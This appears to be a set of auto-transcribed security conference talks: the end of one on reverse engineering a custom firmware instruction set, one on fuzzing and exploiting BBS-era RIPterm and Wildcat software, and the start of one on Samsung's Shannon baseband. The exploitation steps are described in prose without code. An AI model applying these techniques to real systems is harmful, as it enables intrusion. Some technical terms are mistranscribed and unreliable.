explanation either. And that leaves instructions for the other option. They probably aren't absolute jumps because we'd still have the problem about how you encode the jump destination. But what if they're relative jumps? And if these are two-byte relative jumps to a three-byte instruction, perhaps an absolute jump, then that would actually make sense for the one-byte difference, because relative jumps are usually added to the program counter in some way. And that turns out to be exactly what the case is for this particular processor. It's a two-byte relative jump to a three-byte absolute jump that goes somewhere else in the program. And this is a trampoline pattern. 
It's very common in embedded systems. Means the same thing as trampoline. In any other system you've looked at, it's one jump through another to get to the final destination that the first may not be able to reach. And if we look at the last few bytes on the absolute jump, well, we can start deciphering those as well. The lowest 12 bits all seem to differ. And they actually end up having address values that all point within the firmware module that we've loaded. They're all within the size bounds of what we're going to load. So this makes sense. It's a good sign we're on the right path. But we can be a bit easier than this rather than trying to reverse it or analyze it from the bit patterns. The simplest approach is just to make a histogram. Just take the last two byte values and plot it on a chart and see where they go. And you get sort of two main groupings in this distribution. And you see they're spread out over at sort of around zero and around the 32K mark. And you look at something like this and you say, well, I really don't think that this processor has a 16-bit address space. There's no need for it to be using a full 64K of address space. What's probably more likely is that the top, the 15th bit, is actually a selection. It differentiates between two different instructions that both take an absolute address. And so the hypothesis is that the 15th bit is part of the encoding, not the address. And if we follow that hypothesis, we see something that looks much more reasonable. And I want to emphasize, I forgot to mention earlier, these histograms are of all byte patterns that match, you know, that start with an OF byte. And so that's basically based on every single OF sequence in the file. And it's a very small file. So you don't see a lot of noise. Normally you'd have a lot of random noise on the baseline. But this is such a small sample that you don't see it. So this is all things that match. And you see it collapses right down into a nice distribution. And that's all within the address space of the program ROM that's, or within the size of a potential program ROM plus the loadable module. So we have a pretty good guess at, you know, now relative jump, absolute jump, and now possibly what we think might be a call. Because if you look at, basically, Silicon costs money. Unlike a malware VM where they're trying to deter you from analyzing it, the Silicon is all about how can I build it in the simplest and cheapest way that it'll work. And an absolute jump is really similar to an absolute call. The only difference is that the absolute call has to push the return address onto the stack. So it makes sense just to have a single bit that says, hey, you're going to have to push the return address when you execute this. And once we have a call, we can find RET and the value for return. And so functions normally look something like this. You've got a function, a return address, followed by another function. And indeed, this is one of the heuristics that was proposed by Chernov and Trozina at Rekon 2012, except they were going the other way around using RET to find call as opposed to vice versa. But unfortunately, a lot of embedded systems aren't quite that simple or as simple as the picture I've shown. For example, in RME, you have constant pools where you have read-only data allocated, or in some cases rewrite data I've seen out of one compiler, allocated right after the function body. 
And in some cases, you also have alignment bytes, and that might be because the processor requires it, because that's what the ABI calls for, or sometimes that's just what the compiler does for no particularly good reason. So thankfully for us, the ADF 7242 is pretty simple. And so this is a histogram of the byte value immediately before a call target. So you look where a call points and then make a histogram of all of the byte values immediately before that. And there's one byte that sticks out as being by far more prevalent than any other immediately before we're a call may point. And that's byte value OXA, which is also the new line or return character. And if the analog devices guide that originally built this core is out there, it's particularly nice that you made a return instruction, the return character. It's very convenient. So while this works for the naive example here where you don't have any spacing between functions or paddings, a heuristic that works quite well, and I've used on other systems where it was a bit more complex, is to do sort of a weighted histogram where first you eliminate the padding, and you can figure out what that is because the padding is usually the same. And then weight the count of the byte based on how far it was back. So you have like a 10 byte look back window or something like that before the target, and then weight those in. And that usually ends up with red in the top three or so. So that's worth trying as well. But there's other function structures that we can use to our advantage. Functions generally need to save and restore cally saved state. And some embedded arcs save it for you, but most are pretty simple. And this is where on this particular target that I stopped being able to use fancy histograms and analyses because the sample size is just too small. Everything just gets lost in the noise floor, and there's no point in looking anymore. But so the saving of state is usually something like a push and a pop pair at the start and the end. And some manual analysis, just looking at functions, identifies a pair of byte values that either always occur together or never occur at the start and the end of the instruction. So you have a pretty good clue that that is involved in saving state of some kind. And I'm not going to walk through the whole trial and error process of this entire core because, A, I don't have the time and, B, you'd all be bored out of your minds. So I'm going to sort of leave the static analysis process here for now and just touch on a couple other points before I move on to some dynamic stuff. Remember, we can cheat. In the loadable processor module app note that they had for this particular firmware file, it had a number of memory locations. And those memory locations were used to configure the address matching. So you knew that those memory locations would contain an address. And therefore, those addresses or memory locations had to be loaded somewhere inside this so that they could be used. So we can go constant hunting. Go hunting for the binary value of the constants of those memory locations. And that's an immediate real quick jump to move immediate followed by move registered indirect. And you find those right away. And nothing says that the processor has to use the same memory mapping as your external configuration interface does, which is over spy in this case. 
But it's unlikely that they would do anything different because if you do something drastically different, you need two separate sets of address decoders for the same blank of memory. And extra address decoders cost silicon and silicon cost money. And they're using a custom core in the first place probably because they want it to be cheap. Or they need something very high performance that they couldn't do with something off the shelf. So this is the end of what I'll talk about for static methods. But using similar guess and check and validate mechanisms as I described before got us, conditional jumps, well conditional relative jumps and always relative jumps, absolute call, absolute jump, return, as well as move immediate, register to register transfers, register indirect memory, read and write, as well as some ALU operations, which would be ads subtract, compare, bit test, bit clear. And all that came out through sort of guess and check style methodologies. So remember when you're doing this kind of thing is that code is sane. Values shouldn't be written to a register and then promptly overwritten. The ALU and registers shouldn't behave in one way for the vast majority of instructions and then differently for one instruction alone. There shouldn't be a huge number of distinct encodings for the same operation that you think is occurring. And values shouldn't be presumed to teleport between registers or from registers to memory or vice versa. Ironically the ADF 7242 breaks through to those four rules. So you can't take them as a hard and fast rule because this core is very tightly coupled, some hardware around it. But those are some general rules of thumb you can use to figure out if you're on the right track. And in fact, while I was putting this deck together, I was reminded of an attempt to decipher linear A. And linear A is a as yet undecyphered ancient Greek script that was used for writing down their spoken language. And a reviewer of one proposed translation remarked that the quality of a new translation could be judged by how many or rather how few new gods hitherto unknown to history that the translation proposes. And I think the same can be said for binary analysis except replace gods with nobs. If you've got five or six different things that you think are probably a nop because you can't figure out what else they might be, you're probably on the wrong path. So this is our particular all you need for a test bench. This is all you need. I've put the digit key parts up there if you want it, but you can find them both on mouse or any other distributor. All you need is an FTDI cable and the little dev board you can get. So it's really easy to hook up to your computer. I've actually got it with me today. If anyone wants to see it after the talk, just come bug me. And as an aside, dumping the internal ROM on this was really, really easy. So this is the documented command set of the spy interface that you use to interface with the processor. And I sort of wonder what this undocumented area of the command set was if anyone has any guesses about what that might get one access to. It was very easy to dump the ROM so fast to say. So moving on to dynamic methods, and I'm going to have to move really fast because I think everyone wants to go for lunch in six minutes, and I know I won't keep you through that. It's basically make yourself an oracle and then proceed to query it until you learn all sorts of interesting things. 
A processor has state, and this is an example of the state that I knew about at the point I stopped my static reversing of it. I had three registers of various sizes. I, of course, knew the instruction pointer and the RAM. And you, when you execute some instruction on the processor, well, obviously something happens to the state, otherwise it wouldn't be a very useful instruction. So observing this would be trivial if we had a debugger, because you could just single step it and then dump all the values. But in this case, we don't even know if a debugger exists, and if it does exist, we don't know how to use it. So the goal for a test bench to try and go after these things is to set up as much state as possible on the core using the instructions we already know about, which is move immediate. Run an instruction that we don't know what it does, collect all the state that we can, and then compare it to see, you know, compare it against our model of what that instruction should have done, excuse me. And for the ADF 7242, this looks like just generating a test bench program, you know, compiling on the host with a little assembler. Uploading and running that test bench on the hardware, and that test bench sets up the state with the move immediate instructions, as I said. And then the test bench writes the state to that RAM window that I discussed very briefly, because I'm moving pretty quick in this 30 minutes, writes that state, the host reads it back, and then compares it. And one challenge that you have, especially when you only know a little bit about the processor, is that it can be very hard to retrieve some state without clobbering others. For example, I had found that the processor had a condition flags register, because I saw some things working with it, moving nibbles there that were then tested and branched upon. And I knew how to read the condition flags register, but to do so would clobber a register. And similarly, saving that register would trash the condition flags register, so I couldn't get both at the same time. And it's obviously a simple solution to that, is just to make two test benches, one that gathers one part of the state, and one that gathers the other, and then put it back together in software, so you can see the entire state that changed. And when you run a test bench step like that, you then have to characterize the output. The first output is no effect, and that can be that you're actually a nop, but really when you see a whole bunch of things that have no state, it probably means that there is some state that you don't know about. There's something that you haven't realized is in there yet that it's actually being changed. Sometimes it's a constant effect, and the most simple of that is a move immediate or a clear instruction. But it also could be unset or unchanged input state. If there's input state that you're not setting up ahead of time, and it's always remaining constant under your test bench runs, then that would also appear to be a constant instruction. There's deterministic effects. For example, an ALU operation where you add two input registers that you control, and you can predict what the output value will be. There are nondeterministic effects, which only appear nondeterministic because hardware usually is deterministic. So unless you think for a good reason that there's already RAND or RDTSC equivalents down in your particular target, it probably means there's input state that you're not controlling yet. And finally is crash, is a crash condition. 
And that means that you've either found a new piece of control flow that you can't, that you don't know what it's doing, or you've found an instruction that's either unimplemented that results in a processor hang, or you've found something weird. And I'll talk about one of the weird things in this chip that I came across in a little bit. And I strongly recommend building a validation test suite. And that's model each instruction. And then what you do is you have the test suite run such that it compares the execution of the model versus the execution in the hardware. And you should run each test with multiple random input vectors and make sure that you're always predicting the correct output. And something that's really important to do is make sure that you're not trying to predict the entire state, just predict the differentials. So that as you discover a new state over time that you don't necessarily know about at the beginning, then you can just rerun the entire test bench with that new state being set up at something random and see if your predictions still hold. For example, that would allow you to detect the difference between an add and an add see. Initially you might think both they're initially add, they're both add operands, but if there's a carry bit that you don't know to set and you find it later on, then rerunning the test bench will identify, hey, I missed something there, and I should go back and check it. So I'll talk a little bit about the weird and wonderful things I found there. I think I'm down to one minute, so I'm going to get through this real quick. It ends up having two separate address spaces. Program memory is addressed with a 13-bit program counter, and data is addressed with an 11-bit data. So the RAM for data storage is an 11-bit address bus. Internally, it has these registers, and these are the ones I know about so far. And I'm fairly certain those are most of them, but you never know with this kind of system. So there's a couple of registers, which I'm calling general-purpose registers, though they're not really general-purpose. I don't have a better name for them. There's two 10-bit registers and a 16-bit register. R1 is usually used as the value in a load store operation, whereas R2 is usually used as the address. A and R1 are usually used as a pair for ALU ops, so I originally called it A for accumulator, but it turns out not to be that after a bunch of reverse engineering. And there's also two really weird registers, one of which is a packet pointer register, which is sort of a register indirect access with hardware-based offset based on the current packet. It's busy spitting out the RF transmitter. And there's also a specialized loop counter register, which is only ever used by three instructions, which is set loop counter, read loop counter, and decrement and jump if not zero. So that particular register is attached by anything else. So it's sort of weird down at the instructions at level, but it gets weirder. There's some directly coupled IO instructions. For example, there's an instruction that appears to allow turning on and off the power amplifier or setting it to a particular level. There's an instruction that directly enqueues some bits to be transmitted. And some of this, there's also blocking instructions to match those. For example, block the core until this particular hardware function completes, like, for example, transmitting a byte out the RF port. 
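Stepping back to the test-bench methodology for a second, here is a minimal sketch of the host-side effect classification and differential prediction described earlier. The run_on_hardware stub, the register names, and the 16-bit widths are invented placeholders rather than the real ADF7242 harness:

    import random

    REGS = ["r1", "r2", "a", "flags"]        # placeholder register names

    def run_on_hardware(opcode, state):
        """Stub: upload a test bench that sets `state` with move-immediates, runs `opcode`,
        dumps the resulting state through the RAM window, and returns it as a dict.
        Return None if the core crashed or hung."""
        raise NotImplementedError

    def classify(opcode, model=None, trials=8):
        observations = []
        for _ in range(trials):
            before = {r: random.randrange(1 << 16) for r in REGS}
            after = run_on_hardware(opcode, before)
            if after is None:
                return "crash: unimplemented, new control flow, or something weird"
            # only record the differential, not the whole state
            diff = {r: after[r] for r in REGS if after[r] != before[r]}
            observations.append((before, diff))
        diffs = [d for _, d in observations]
        if all(not d for d in diffs):
            return "no effect (or state we are not observing yet)"
        if all(d == diffs[0] for d in diffs):
            return "constant effect (or depends on input state we never vary)"
        if model and all(model(b) == d for b, d in observations):
            return "deterministic, matches the model"
        return "looks nondeterministic: probably uncontrolled input state"

    # e.g. test a guess that opcode 0x1234 is "add r1, a":
    # classify(0x1234, model=lambda s: {"r1": (s["r1"] + s["a"]) & 0xFFFF})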
And ironically, because of the way that's built and it's encoded, you can actually block the core until any condition bit is set. So you can actually do block until not zero, which is not an operand you ever find in the disassembled binary because it's not terribly useful. Once the core is halted, waiting it for it to become non-zero, nothing's ever going to make it non-zero. There's also specialized communications instructions, for example, bit reverse and CRC baked in. And you see a lot of these kind of weird instructions in these special purpose processors. In other ones I've looked at, I've seen instructions for accelerating S-boxes for cryptography, Viterbi decode acceleration, bit shuffle and extract, stuff for accelerating forward error correction. So there's a lot of really interesting things you find down there. And so the state of the tools today for this particular core, I have a disassembler that covers the vast majority of the instruction space. The ones that I don't know about are never appear in the disassembly I have. So the best guess I have is that they're either unimplemented encoding space or they do something that I haven't found state for yet. I have a basic assembler as well as the disassembler, of course, and a loader and IO library for playing with this thing. And I'm going to post it soon at github.com slash David Karn. It's not going to be while I'm at recon because I didn't bring my SSH keys. So thanks for coming out to listen and I guess any questions or does everyone just want to leave for lunch? It is.
|
Have you ever come across a firmware image for which you couldn’t find a disassembler? This talk will cover reverse-engineering techniques for extracting an instruction encoding from a raw binary with an unknown/custom instruction set. The main focus is on static techniques and features of firmware images that you can use to your advantage–but some dynamic techniques will be covered as well.
|
10.5446/32740 (DOI)
|
So this is probably, in my opinion, the perfect talk for the end of the first day. So who here was on BBSes like back in the day? Okay, so all of you I'm sure have wondered at some point in your lives, like, what if we knew then what we know now? I think all of us have wondered that. So I'm happy to introduce Derek Soder and Paul Mehta from Cylance. So cool talk. Thanks. That sounds great. Yeah, cool. Well, so yeah, I'm Derek and I'm Paul and I'm glad you guys are all here. The BBS era is something most of us remember and have nostalgic memories about, and I thought we might talk a little bit about the inspiration for the talk to begin with. Yeah, you know, it started as an April Fool's joke, but like a lot of things that started as jokes, it ended up getting serious. And we decided, you know, around about the time that the REcon CFP opened, hey, wouldn't that make a fun talk, you know, something a little exotic. And yeah, we did end up actually preparing an April Fool's Day press release that just kind of announced one of the vulnerabilities, like as though it were Heartbleed or Ghost or something. We didn't end up making a logo for it because, you know, just GIFs back then, and GIFs were still patented back then, I think. So anyways, that was basically the inspiration, and looks like they accepted the talk and so now you'll get to hear all about it. All right, so the modem era before the internet and everything was one-to-one connection. So you had one modem, you could only talk to one other computer. And yeah, for the few of you who are familiar with BBSes, welcome back. It's good to see you. For everybody else, we're going to talk just a little bit about what is a BBS. So a BBS is one of the things on this screen. We're going to be hacking one of them. Point to whichever one you think it is. Go on, don't be shy. Okay, well. All right. I see just a few of you all are participating, and if you're pointing at the kitty, you win. Congratulations. So the server-side software that we were looking at is called Wildcat. And Derek, I know you're going to tell me something about Wildcat. Yeah, the funny thing about Wildcat is Wildcat is wild. There you go. There's your anachronism. Take that box. Yeah, take it away. So we're looking at essentially the architecture of how they talk to each other, and it's over a phone line. So everyone from the 90s has heard that sound when you pick up a phone and someone's using the Internet. Yeah, call waiting is the bane of my existence. And so there is another side to it. There's also the client side, and the client side ends up rendering whatever the BBS sends back. And that leads you to Legend of the Red Dragon. Anybody? Awesome. Good times. That was my formative years. So yeah, you've got exactly one computer, yours, connected to exactly one computer, the sysop's. Hopefully the sysop isn't sitting there staring at everything you're doing all the time, but they totally could if they wanted to. And yeah, contrast that with today where everything is connected to everything all the time, and we've come a long way. They're probably still watching, but... And now it's not just one sysop. So looking at this, we wanted to kind of ask the question, because, well, is it relevant? Are BBSes still relevant today? For scale, in the last 30 days or so, there have been 10 new BBSes that have gone up. Well, welcome to the internet. Wrong term. And I think in comparison, there have been roughly 16 million new websites per month or so.
So the scale here, you've got to take into account. But there are still new BBSes going up and people still use them. And I looked it up, actually, as of 2015, there's still 2.1 million people in America on dial-up. I got nothing to say about that. I doubt they're on BBSes, but I thought it was kind of interesting. So now that you all know about everything about BBSes, now here are the programs that we're going to attack. Wildcat being the BBS software, the server. And then Ripterm being the client, it's the terminal program. Ripterm typically calls Wildcat. And with the sound that goes something like, it's working. Is that warm you right here? We clipped it for conciseness. It actually ran on for like a minute or so. So we thought we'd look at back then and today. Who knows where this guy's from, the blue guy? Yeah, thank you. And the comparatively orange guy? Yeah, there we go. The past and the present, united in one slide. So when it comes to software, what did we use back then and what do we use today? So back then people would boot from a disk. And today we really have to use DOSBox or if you're running on like 2003, you can use TVDM which, well, to debug back then. Yeah, remember DOSDebug? It doesn't even have break points. Oh, did I just step on something? It's not supposed to look that way. Okay, well, now today the specific content's unimportant. Today we use WinDebug mostly or GDB if you're on Unix and DOSDebug which we actually found to be quite useless. That's a DOSBox debugging interface. It's a bit of a pain. You can rebuild it with debugging support. Yeah, we just weren't able to bring very much good out of it. And looking at disassembly, I think you may have had to use debug back then. The premier reverse engineering tool of the 80s and 90s. Nowadays we have things like IDA and a slew of other tools at our disposal which makes it a lot easier from a reverse engineering point of view. Back then, today we have things like Procwan. Back in the day, security was war-dialing and guessing passwords. Today, it sees invisible million-dollar O-days. It's like the emperor's new clothing but in reverse. You can't see them if you're a good person. I'm just kidding. I still like y'all. So back then you got stoned apparently. And today it's a lot more annoying. I have to pay your ransom in Bitcoin. Dead drops. Gold bullion. And now looking at the post-modem era. Great leap forward, often requires two steps back. Not always though. These are what? This is not always a great leap forward or it's not always two steps back because we're about to take a couple of big steps back. Starting off talking about rip term. I mean, I'm just going to go through the basic tear down the same way we look at apps nowadays for like security assessment. What is the attack surface? It's a client but it's got all these protocols that it supports. There's the protocol that speaks with the modem which we don't expect to have too much influence over. So this is a command to dial a number and then the modem might say back no carrier or connected or whatever. There's a telnet protocol. ANSI codes, really great. Before there was a rip script which I'm about to get to, there was ANSI for all your color and cursor needs. There are various file transfer protocols. XYZ modem, I don't know. Didn't look into that because really once we looked at rip script there was no need to go anywhere else. This is super rich. So these got telegraphics. 
They were working on and if there's anybody from telegraphics here who worked there once upon a time, I love your software. Don't take any of this the wrong way. It's just a convenient old program for talk about modern day attacking. And it supported this really rich protocol called rip script for drawing vector graphics essentially. Whereas with ANSI you can make ASCII art and pretty colorful ASCII art but just ASCII art. With the rip script you could do all kinds of things. And accessing files on the client's computer is really crazy. So it's not script in the JavaScript sense where you can massage the heap or something too bad but you can do a lot. So we're going to look at that for vulnerabilities. Wonderful find anything. So we actually found something before we actually got to the reverse engineering part. But when you actually open up rip term in IDA, it doesn't really know what you're looking at and it's not something you can massage into something nice. You have to actually take one step further before you can be reversing it in IDA. And so we found two different ways to do this that I'm sure there's a whole bunch more but we thought that so Derek here actually took the LE and reconstituted into a PE. Almost. Okay. So for a little bit of background, the whole thing looks like a 16-bit DOS EXE but the 16-bit code sets up like this DOS protected mode environment. It's like the Wacom DOS extender if you've heard of that. And then inside of the EXE it's got embedded this linear executable which is actually I think the same format, almost the same format as Windows VXD's use. It'll load that into memory but there are just enough differences to make it annoying to where you can't just cut it out of the file and then load it straight in IDA. I got about as far as applying the relocations to it but then I just ran out of time because Paul came up with a better way. So it was kind of funny Derek was working on it and you spent a couple hours and I was like why don't you just do this? So I ran it in NTVDM and I was like give me a byte sequence Derek. So it was nice enough to spit one over and did a search, dumped the region of memory to disk, opened that up in IDA and there you go. It understands it and it's nice, it's easy, it's an oldie but I mean we still use it all the time. So that worked nicely. And this here is the process basically dumping it and going from a crash to an analysis and what we found was well you guessed it. It's a little hard to read but yeah, it's a straight copy. Now this is how Derek actually ended up with the crash. So what's your go-to technique nowadays? When in doubt you just fuzz it and see what happens. And so we did. I wrote this to a real dumb fuzzer. The annoying thing are those message boxes you see popping up. There are certain commands you can do that will cause a message box and then everything stops until it's dismissed. So I wrote a little program that would just emulate escape keystrokes to make it go away. I got a few seconds. Real cheesy but good enough. I don't think you could do that back in the day. So this is just a recording of what it looked like and it's drawing vector graphics here and you'll see lines and stuff like that which we thought this is the perfect place to look. And there's just like, I'm going to go with dozens. Dozens of commands. There's all that bang pipe and then command sequence and then parameters. And so the fuzzers really just doing a bunch of that, just generating a bunch of bang pipe garbage. 
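A toy version of that kind of dumb bang-pipe fuzzer might look like the following; the command letters, parameter lengths, and the idea of writing each case out to a file for the terminal to render are guesses for illustration, not the actual fuzzer from the talk:

    import random
    import string

    PRINTABLE = string.ascii_letters + string.digits

    def random_command():
        # "bang pipe", then a short command sequence, then a blob of parameters
        cmd = "".join(random.choice(string.ascii_uppercase)
                      for _ in range(random.randint(1, 2)))
        params = "".join(random.choice(PRINTABLE)
                         for _ in range(random.randint(0, 60)))
        return "!|" + cmd + params

    def fuzz_case(n_commands=20):
        return "\r\n".join(random_command() for _ in range(n_commands)) + "\r\n"

    if __name__ == "__main__":
        random.seed()
        with open("case.rip", "w") as f:   # feed this to the terminal however you like
            f.write(fuzz_case())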
And sometimes you get a circle. Sometimes you get a line. And then sometimes you get Rippy. No, the fuzzer's name is Rippy. And sometimes you get a crash. This is the DOS extender itself intercepting the fault and then just doing a core dump thing to the console. What is that up in the corner? Do my eyes deceive me? So it didn't actually crash at 0x41414141 the first time. Sorry, what was that, Steve? But this is after we massaged the proof of concept a little bit; we got control over most registers, most notably EIP. I don't know if I quite have time to get into it, but this is a little weird. I was expecting RIPterm to be like 16-bit, totally real mode. But no, not only is it protected mode, but it's actually 32-bit flat address space. I guess the DOS/4GW extender, presumably the 4G stands for 4 gigabytes. So that's why this crash dump looks like such a familiar format. Now when it comes to exploiting RIPterm, this is like taking a step back in time and realizing, wow, okay, we have the keys to the kingdom here. There's no DEP. Pretty much everything is RWX. It's like, okay, sweet. There is no ASLR. That's also nice. No SafeSEH. No SEH. No stack cookies. Control flow guard. They didn't have control flow guard back then? I don't know what they were thinking. No CET or control-flow enforcement technology. That's a new one. And it wasn't a problem. Can I do that? So we kind of went from, we took it to an extreme. We tried to do like ROP. And it totally worked. But then we were like, what's the point? Which kind of summed it up nicely. So we had our choice of tools. We had WinDbg on NTVDM, which is pretty cool because you get to see it executing in protected mode with arbitrary selectors or in virtual 86 mode or whatever. Pretty convenient. Then there is, of course, the DOSBox debugger. But that wasn't a pleasant experience. So it's not actually a debugger. So you can't set real breakpoints and it's very frustrating to use. This brings us to the other application that we looked at, the server side. So pretty much Wildcat is, at least from our client perspective, it's all just text-based GUI. Like, TUI. So yeah, UI, we'll say. So this is pretty much your attack surface. Whatever you can get it to do or whatever protocols it's going to speak, which is mostly just user keystrokes and input. But there's file transfer. We didn't really get into that because, oh, well, first we should talk about how to reverse Wildcat. This went a lot better than RIPterm. Let me tell you. Like IDA works like a charm. It knows, OK, so Wildcat was written in Pascal. It's all 16-bit. And IDA, bless its heart. It knows all those functions. Like it has FLIRT signatures. So it found their allocs, found their copies. And it's like, oh, that's pretty handy. Yeah. The decompiler didn't quite work. Didn't expect it to so much. But nobody wants to go back to far pointers. OK. Now let's actually talk about tearing it down. So we walked through a bunch of the functionality. And this is just like a test drive version of Wildcat off of some public domain or some freeware CD. So I'll just cut to the chase. This is where we end up looking. Messages. Enter a message. You can enter a message. And now they have a 151 line limit, which, OK, you can only enter 151 lines. But you can insert wherever you like. Yeah. So they didn't bother to check which line you put there. And I'll tell you why that's cool. So Pascal has all of these strings, like these counted strings. There's no, like, strcpy buffer overflow that I know of in Pascal.
So like the lines in this message were truncated at 80 characters. But then you get to thinking, well, how about heap allocations? There are almost no heap allocations in Wildcat. Its use of the heap is paltry. But it uses it here. And here there's like a 16-bit arithmetic overflow. You put in a line number. It multiplies it by 81 to go find the place in the buffer to put it. So we were thinking it'd be funny if part of the exploit includes, OK, go here, enter a message at line 810 into these contents. 810 worked out to the size of a line times the number that you enter. And you only have to wrap a 16-bit variable. So you can end up overflowing the previous string. And you overflow the character that says how many characters are in the string. The good point of it was, yeah, like pretty much almost arbitrary control over where it writes to within that 64K segment. The bad part is, it's within the 64K segment. And there were basically, there's no heap header to overflow. There was a free list. But because it uses the heap so little, it didn't actually matter over providing the free list pointers. So we did not get code execution in Wildcat. This turns out to be a useful tool in crafting like a malicious message. But that's a story for another day. You know, demo? Yeah. OK. So we have a bit of a demo here. How do we get out of this? Sure. All right. So the demo's up here, Derek, for you. This is using that 16-bit wrap that we just talked about and entering some malicious payload. Now, this is DOSBox on both sides here, and they're talking to each other. Oh, very cool. Yeah, DOSBox is neat because it emulates modems. I think, oh, sorry. Yeah, do you want to drive? Sure. I think we just need to save it and open it. Yeah. So I think this was best done as a snapshot because you can enter this stuff by text, and nobody wants to wait around for that. And then entering your shell code with all number, number, number combinations by byte. That's for real. So we're just going to go there, and we're going to read that message that we just entered. Presumably you leave it for someone else, but... And what you end up with is a nice crash. And then it disconnects, and you can turn this crash into code execution fairly easily. So, it's like receiving a phishing email with an exploit attached to it, but old school. Just call this number with your modem. All right. Okay, so we just did that now. Now, we have one more demo to show you guys, and this is kind of where we left it. I think it shows off this perfectly. If you guys ever tried to get someone to play a game, and they're like, yeah, I'll do it in a minute. I'll just leave you alone. They never get around to it. Well, I think we may have solved that, Derek. Oh, man. Hold on. Okay. I tried to decrease the resolution just before so you guys can see it better, but we'll go back here. The wonders of DOSBox. Oh, sorry about that, guys. Thanks. Thank you for telling me. Okay. Here we go. So, this is just running RIP term, and it's talking to another application over a modem here. So, we're going to see an incoming call. Who's there? Why don't we answer it? And you launch DOOM on the system. Now you guys remember this? We were thinking about what to do with it, and it brings me back. The 90s live again, if only in our emulators. All right. So now that's the conclusion, and any questions? Y'all feel free to ask questions or watch us play DOOM. We're not going to make them watch us play DOOM. All right. Buddy, everybody ready to go to the bar? Yeah. 
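For reference, the arithmetic behind that 16-bit wrap works out like this (81 bytes per line is presumably the 80 characters plus a Pascal length byte; the exact layout is an assumption):

    LINE_SIZE = 81        # 80 characters plus, presumably, the Pascal length byte
    line_number = 810     # well past the 151-line limit the UI enforces

    offset = (line_number * LINE_SIZE) & 0xFFFF   # the 16-bit multiply wraps around
    print(line_number * LINE_SIZE)   # 65610
    print(offset)                    # 74 -> the write lands back near the start of the buffer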
It's not a question, but I just want to mention that for Recombi 2013, there was a Recombi VBS. Did you guys call it? No. So, the comment was that in 2013, there was a Recombi VBS. I had no idea. Yeah. So, I was wondering if you guys were going to be able to answer that question. I was wondering if you guys were going to be able to answer that question. I wish we'd known about that. We tried to stay away from hacking real computers. Opportunity missed. Give me the number. I'll hurt it here first. What else? I'm just going to guess if it's worth it. I'm just going to guess if it's worth it. Sure. Why not? Sounds reasonable. I wonder if those would be expensive or cheap. Yeah. What is the demand for those? We'll set the price at $1 million. Sounds reasonable. $9.99.95. Or they could just go and fuzz it themselves. Now, they know how because, you know. It's like software antiques. Anything else? Anything else? Y'all have been too kind. Okay. Thanks. All right. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
|
The bulletin board era was a golden age for those of us who were into computers (and in existence) at the time. Yet, think of how much better it could have been if we’d had today’s exploitation tradecraft to bring to bear back then. In this presentation, we’re taking modern technology back with us a couple decades and aiming it at BBS-era software, possibly to see what we can learn from attacking these scrutable-yet-unusual systems but mostly just because we can. We’ll use tools and techniques that didn’t publicly exist at the time to run, reverse engineer, attack, debug, and exploit old code. Finally, we’ll demonstrate some of the fun we could’ve had, if only we knew then what we know now… Source code and proofs-of-concept will be released.
|
10.5446/32742 (DOI)
|
Are you ready? Okay, cool. We're going to continue with the next talk now on some adventures in the cellular baseband. All right, thanks. Hi, everyone. Welcome to Breaking Band. I'm Daniel Komaromy, and together with my research partner, Nico Golde, we're going to talk about reverse engineering and exploiting baseband software. So, baseband security has been a pretty hot topic in the last couple of years. Going back to 2009 and 2010, it started mostly with a couple talks on SMS fuzzing and then exploitation of memory corruption issues in baseband OSes. But in the time since, even though there's been a lot of good research on protocol security, there's not been a lot of new information published explicitly on vulnerabilities and real exploits. And that's been the case even though the basebands have been targets at Pwn2Own with some of the highest payouts, but without any attempts until last year, of course. And in place of that, there's been, I guess, what I would characterize as, so far, a lot of repeated information that might have actually been accurate five or six years ago, but rehashed doesn't necessarily remain factual these days. So, that was basically our original motivation to get into this research. And talking about targets, obviously, Qualcomm basebands have been the biggest recipient of attention in the recent years. And that kind of makes sense because they have maintained a very large market lead in this area. But of course, we used to work for Qualcomm, so we didn't have the opportunity to contribute to public research in this domain. However, last year was kind of a sea change because Samsung decided to ditch Qualcomm basebands in their flagships and instead introduced their own implementation that they call Shannon. And this gave us an opportunity to go after a target at Pwn2Own, as well as to essentially try to answer the question, okay, so there's this concept that baseband OSes are these massive black boxes and create this opaque security nightmare scenario where only some initiated few might understand how they work, but it's not possible to keep up with them from the outside. So, we felt like we wanted to take that challenge, to see really how far just a couple guys in their free time can go in the period of a few months. So getting to the meat of the talk, we're going to start by describing our steps to understand and reverse engineer the real-time operating system and then finding vulnerabilities and finally what it took to put together a full remote code execution exploit. And what we tried to do is not just go through the results and be like, this is what the OS is like, but explain how we went through the process of understanding things, and not just talk about the successes but also the failures. And then at the end, we ended up building quite a few custom tools and scripts that aided us and we are going to be releasing all of those. So, to get started on Shannon, this is essentially Samsung's own baseband implementation. It's an entire stack including full support for LTE and it's really not new. It goes back to really old devices, not just phones but USB sticks, but it was with the S6 that it was first introduced into their entire flagship line. But it's also used on non-Samsung devices. There are some Meizu phones that use Shannon basebands and Samsung continues to use this design. So, essentially the S7 line has come out now and essentially all the models that are sold in the US use Shannon still.
And so, when you get started, the first thing you want to do is acquire the firmware. This in the case of these phones is pretty straightforward. The Modem image is just one of the partitions accessible on Android, on the radio partition precisely. But once you have that blob, the naive approach doesn't get you anything. BinWalk doesn't recognize any meaningful signature here so clearly you're dealing with some kind of proprietary format for the firmware. So, the next thing you do is just to file up your favorite hex editor and try to make some sense of the header format, which in this case, luckily, wasn't that complicated because this file format that we call TOC for the first marker, which presumably just stands for table of contents, nicely includes as you can see on the slide, ASCII strings for the different parts. So, you quickly get an idea for what this is. And it's essentially just an enumeration of the various firmware parts that are stitched together. That includes a boot section, which is some type of bootstrap code. We talk about that later. And then the main, which is essentially the entire real-time operating system. And then there's two data partitions. One is NV that stores essentially radio configuration data that goes into nonvolatile memory. And the last one is called offset. That's also some data. We're actually not really sure what the purpose of that is, but we really didn't need to figure that out for our purposes. And then the last thing that's sort of obvious at the first look is that there's some kind of signature or hash attached to the firmware as well, presumably, of course, to use implement secure boot. So then you start looking at these different pieces. And first with the boot, we basically get lucky. Just looking at it in the hex editor, it's really apparent that you're looking at plain text code. That's an easy trick with ARM that you can often do. Because of the conditional codes in the first nibble, essentially, if something is code, then you will see these columns of E everywhere. And sure enough, if you fire this up in IDA, you get a very decent result from the auto analysis. And you could just get started from the beginning, from the reset handler and try to figure out what this exactly does. So we'll get back to that in a second. But more interestingly, then you want to look at the main part. And here we are not so lucky. It's a pretty massive 